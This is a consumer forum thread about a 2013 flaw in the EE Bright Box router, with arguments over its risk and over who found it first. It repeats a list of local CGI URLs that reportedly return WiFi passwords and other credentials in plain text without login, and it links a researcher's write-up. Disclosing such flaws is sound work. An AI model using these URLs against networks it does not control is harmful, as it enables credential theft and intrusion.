Bright Box plain-text security leaks

I put these URLs into a browser on a machine in my network... a machine that has NEVER connected to the router pages... and it gives up PLAIN TEXT security data... try them youselves.

The machine was not even logged in on the router!


Brower: "Give me all your security credentials"

Router: "Oh, okay!"

http://192.168.1.1/cgi/cgi_status.js?t=1381432913046

http://192.168.1.1/cgi/cgi_wifi_wpa.js?t=1381433787099

http://192.168.1.1/cgi/cgi_atmint.js?t=1381434119553

http://192.168.1.1/cgi/cgi_status.js?t=1381434119550

http://192.168.1.1/cgi/cgi_security_log.js?t=1381434403382

http://192.168.1.1/cgi/cgi_wireless_wps.js?t=1381434403382

Edited by glossywhite (Thu 10-Oct-13 21:04:52)

Does this leak occur externally?

To save copy & paste and Typed URLs:

In reply to a post by glossywhite:

http://192.168.1.1/cgi/cgi_status.js?t=1381432913046
http://192.168.1.1/cgi/cgi_wifi_wpa.js?t=1381433787099
http://192.168.1.1/cgi/cgi_atmint.js?t=1381434119553
http://192.168.1.1/cgi/cgi_status.js?t=1381434119550
http://192.168.1.1/cgi/cgi_security_log.js?t=1381434...
http://192.168.1.1/cgi/cgi_wireless_wps.js?t=1381434...

Yes, script failure on IE8 but works on FF24.

Does it matter that someone on my network who is able to spend ages generating random #s can eventually see my 3 passwords, cuz that's all that's secret that's revealed?

In reply to a post by XRaySpeX:

Yes, script failure on IE8 but works on FF24.

Does it matter that someone on my network who is able to spend ages generating random #s can eventually see my 3 passwords, cuz that's all that's secret that's revealed?

If you were a guest on on one of the virtual networks (which could be left open), I'd have to suppose that, yes - it would matter a LOT.


[Update]

Just connected to my OPEN virtual WiFi on the Bright Box, and it hands over the info no questions asked. So, someone just has to connect to your open virtual network, inject the URL, and... WHOOPS! - they can now join ANY of your wireless networks, and view all your shares.

Seems like an issue to me.

Edited by glossywhite (Fri 11-Oct-13 19:41:45)

What virtual networks might I have & how might they be left open?

As far as I know I only use the router in a normal way and only have SSID1 & VLAN1 enabled, if that's what you are talking about.

To issue any of these commands the intruder will first have to connect to the router and pass its authentication. Chicken & egg!

And if he could do that then he could just as well access all this info thro' its standard GUI without needing these arcane commands.

In reply to a post by XRaySpeX:

What virtual networks might I have & how might they be left open?

As far as I know I only use the router in a normal way and only have SSID1 & VLAN1 enabled, if that's what you are talking about.

If a case study was carried out about Bright Box routers and their usage, and you were the sole participant, then that would be acceptable I suppose, but you're not. It's a security flaw - anyone can see that.

Think outside of your own personal situation, and realise that people DO use these features - I for one, use them - if people do not use them, why are they there? I have friends who own shops who provide a WiFi segment for customers, open, and their own protected network for their own use.

Phrase it however you wish - a flaw is a flaw, and it's a demonstrateable one too.

Edited by glossywhite (Fri 11-Oct-13 20:05:06)

I simply asking you a Q of your superior knowledge of routers. I was never implying that I was a representative user; simply enquiring how this flaw you identified might affect me.

If you are not prepared to answer then so be it! It would seem to be unimportant.

There was no need for your sarcasm and condescension.

In reply to a post by XRaySpeX:

I simply asking you a Q of your superior knowledge of routers. I was never implying that I was a representative user; simply enquiring how this flaw you identified might affect me.

If you are not prepared to answer then so be it! It would seem to be unimportant.

There was no need for your sarcasm and condescension.

I did not intend to be patronising, sorry.

Look - the flaw is the flaw, and it's there - you can decide how it impacts you, with reasoning and common sense, not me. I'm not a personal IT consultant - it's obvious, is it not, that if you perceive no issue, then you perceive no risk; the fact that it is present is obvious and has been shown. That's all that can be said, really.

Edited by glossywhite (Fri 11-Oct-13 20:34:00)

It's takes 2 to tango!

In this case I contend that it is your issue by not being prepared to answer a simple reasonable Q. I have claimed no 'rights' in this thread; only Qs.

Here ends the lesson !

In reply to a post by XRaySpeX:

It's takes 2 to tango!

In this case I contend that it is your issue by not being prepared to answer a simple reasonable Q. I have claimed no 'rights' in this thread; only Qs.

Here ends the lesson !

Have a nice night - there's more to life that routers and being right

In reply to a post by glossywhite:

Just connected to my OPEN virtual WiFi on the Bright Box, and it hands over the info no questions asked.

Not surprising if you leave an unauthenticated SSID (don't see 'virtual' comes into it). You don't even need to inject these special URLs!

In reply to a post by glossywhite:

there's more to life thatn routers

Too true! Funny how all your posts have been about them; indeed just the BrightBox.

In reply to a post by XRaySpeX:

In reply to a post by glossywhite:

there's more to life thatn routers

Too true! Funny how all your posts have been about them; indeed just the BrightBox.

You don't let up, do you.

Even a fool appears wise when he says nothing; surely saying nothing is better than causing hard feeling just because you can't NOT say something?

I'm sure you're much too clever than to make "smart" comments, the only purpose of which are to cause annoyance and offence - this is not the first time you have been needlessly pedantic and know-it-all to me - I'd urge you to stop - you don't exactly endear people to you, making them WANT to communicate.

Edited by glossywhite (Fri 11-Oct-13 21:57:51)

Hi glossywhite,

I've sent you a PM if you get chance to pick it up and respond that would be great.

Scott.

In reply to a post by glossywhite:

PS: Amazing things, firmware upgrades, because even router designers are human.

I tried to tell you last year how rubbish these routers are, but you insisted it was the most amazing piece of networking equipment ever produced.

Edited by Pipexer (Wed 08-Jan-14 21:10:11)

In reply to a post by glossywhite:

I put these URLs into a browser on a machine in my network... a machine that has NEVER connected to the router pages... and it gives up PLAIN TEXT security data... try them youselves.

The machine was not even logged in on the router!


Brower: "Give me all your security credentials"

Router: "Oh, okay!"

http://192.168.1.1/cgi/cgi_status.js?t=1381432913046

http://192.168.1.1/cgi/cgi_wifi_wpa.js?t=1381433787099

http://192.168.1.1/cgi/cgi_atmint.js?t=1381434119553

http://192.168.1.1/cgi/cgi_status.js?t=1381434119550

http://192.168.1.1/cgi/cgi_security_log.js?t=1381434403382

http://192.168.1.1/cgi/cgi_wireless_wps.js?t=1381434403382

If I use the router default gateway IP address 192.168.1.1 or my own chosen gateway IP address 192.168.XX.XXX None of those URL addresses work with my Bright Box 1 router, all I get is Microsoft JScript runtime error.

Using Windows 7 Pro with Internet Explorer 11

Edited by deleted (Thu 09-Jan-14 12:19:21)

In reply to a post by E7er:

all I get is Microsoft JScript runtime error.

As I pointed out ages ago, yes they fail on IE, but they work in FF.

I thought you'd be interested in an article I've just written about the EE BrightBox.

It seems the security of the device is worse than it appears, allowing an attacker to bypass the admin login, exploit the device remotely and even take control of your EE account by leaking credentials.

You can see the article on my blog here: http://scotthel.me/eebb

Scott.

In reply to a post by ScottHelme:

I thought you'd be interested in an article I've just written about the EE BrightBox.

It seems the security of the device is worse than it appears, allowing an attacker to bypass the admin login, exploit the device remotely and even take control of your EE account by leaking credentials.

You can see the article on my blog here: http://scotthel.me/eebb

Scott.

Hello Scott

That's a nice article; FAR more research than I could be bothered to do over such a poor device. I'm now moving back to electronics as the majority of my work - I'm a hardware guy more - I have been since I was a child - software just frustrates me and confuses me.

LOVE the shotgun - that's the best thing for this piece of hardware - I have SIX spares, all brand new, and do you think EE will listen to me, and send me a BB 2? Nope - they just stonewall me. Poor show.

Great article!

God bless you,

Matt.

Hey Matt,

Yeah, it is bad that they're still shipping these things out and considering how long they have been aware of this and not patched it, well, unbelievable.

I've been trying to get a BB 2 also, let me know if you have any joy and how you get one.

Cheers,

Scott.

At last EE taking action:

EE rushes to fix broadband box security risk

Well done, Scott, and getting it in the news !

In reply to a post by XRaySpeX:

Well done, Scott, and getting it in the news !

I thought it "wasn't an issue"?

How soon people change their minds... LOL.

Where did I say that? I just pointed your findings were of low risk, not Scott's.. Here I was just congratulating Scott on his much more in-depth research.

You are most spiteful and defensive!

I notice the scotthelme website doesn't credit you for finding the exploited URLs.

Who originally discovered these?

Post deleted by Zak_

I found the first exploited URLs using packet sniffing software and then went on to find the rest from the device itself. I used to be a firmware tester so hooking up to JTAG/serial headers on an embedded device is something I'm familiar with.

If credit were due, it would have been given!

Scott.

Thanks to Zak and Ray for the comments/links!

In reply to a post by ScottHelme:

I found the first exploited URLs using packet sniffing software and then went on to find the rest from the device itself. I used to be a firmware tester so hooking up to JTAG/serial headers on an embedded device is something I'm familiar with.

Oh ok. I'm interested to know where glossywhite got the URLs from in October 2013, since your blog entry is dated this month. Did you publish this information elsewhere in October 2013?

You're not making any sense at all. Are you implying that because Unlokia published some of the URLs first that the only possible way anyone else could find them is by using his post? Seems a bit odd, but that's the impression I'm getting.

To my knowledge, I can't find anyone else that has made reference to some of the URLs I have published. That doesn't mean that should anyone else ever make any mention of them that they must have found them as a result of my work and attribute credit to me.

As I mentioned, and as detailed in my blog, my first exploration and discovery was made with Fiddler, a packet capture program.

In reply to a post by ScottHelme:

Are you implying that because Unlokia published some of the URLs first that the only possible way anyone else could find them is by using his post?

I was just wondering who was the first person to discover the exploited URLs, that is all.

Well Unlokia found some first and I found others first. For all we know, someone else could have found them in 2012 and not published it on the Internet. They could have found it 'first' and we'd never know.

It's not really about "who found what first", I only came across Unlokia's work once I started putting the file names I'd found in Google. It's about giving credit where credit is due. If someone makes mention to the additional things I have found, but they found them through their own research, or potentially even a different method all together, I'm not going to jump up and down and demand credit simply because I published the file name 'first'.

Well, you managed to make EE & BBC to sit up and take note which is more than Unlokia ever did, and it strikes me that you employ a much more scientific and methodical approach.

It was just luck that it got picked up by a few news outlets and kind of worked its way up from the smaller ones all the way to the BBC. Thanks for the comments

In reply to a post by XRaySpeX:

Well, you managed to make EE & BBC to sit up and take note which is more than Unlokia ever did, and it strikes me that you employ a much more scientific and methodical approach.

I'd say Scott has done more than any of us have done, including me, especially since it was posted back in October; there was nothing stopping anyone else reporting it, hey

I'm not into software as my career; this was a side-line "pet" project which I became bored with and lost interest in. I didn't owe the world a thing, and know it, so I dropped it - that's what happens in life - I don't feel a need to defend it

Listen folks, I'm not at all concerned who found what first; I am extremely pleased for Scott that he has managed to get this publicly ack'd and has made EE take some steps to "fixing" (hmm) their useless routers.

Do we really need to pick and bicker over "who found it first?" - that's what 7 year olds do in the playground, not responsible adults. I am actually very happy that Scott has taken all this time out of his life to make this research available. I don't feel the need to question his integrity about ANYTHING - if he says he was unaware of my links/info from last October, then I completely believe him - that's the end of it, no more sillyness please.

Scott, you're a very good bloke mate - God bless you, and thanks for the correspondence. I am moving away from firmware and software now, and massively focussing on my primary love - electronics!

I'd love to help, but I am otherwise occupied for now. I do not expect any "crediting", as you said - ANYONE with a little patience could have found this info. These kind of petty squabbles with people possibly twice my age, is why I don't frequent this forum very much; I simply don't have the desire to have strangers rant and steal my joy - I'm a happy person, and I'm not going to give people reasons to deride me - you don't know me, and you may think what you will; I cannot stop you thinking it, but it won't affect who I AM - God decided that, not you

Take care all, and Scott - especially to you - I'll gladly help hardware-wise if I can with photos etc, but no promises on timescale... could be many months.

Adios, and God bless you all

Matt.

Edited by glossywhite (Tue 21-Jan-14 21:12:31)

In reply to a post by glossywhite:

there was nothing stopping anyone else reporting it, hey

As you addressed one of my posts, I see I need to put you right on one of your misconceptions.

Not all of us are hardware geeks like yourself. I only claim to be a software geek focusing on logical & analytical methods. As you yourself said, you are not into software; likewise me with hardware.

Many times you have brought a hardware project to the table here and when I have asked you Qs on it, as your tabling of it entitles me, you have told me to go away and do it myself. Now I hope you can see why that was inappropriate.

So, yes, what Scott & yourself did is well beyond my capabilities and I was congratulating Scott on his thorough approach.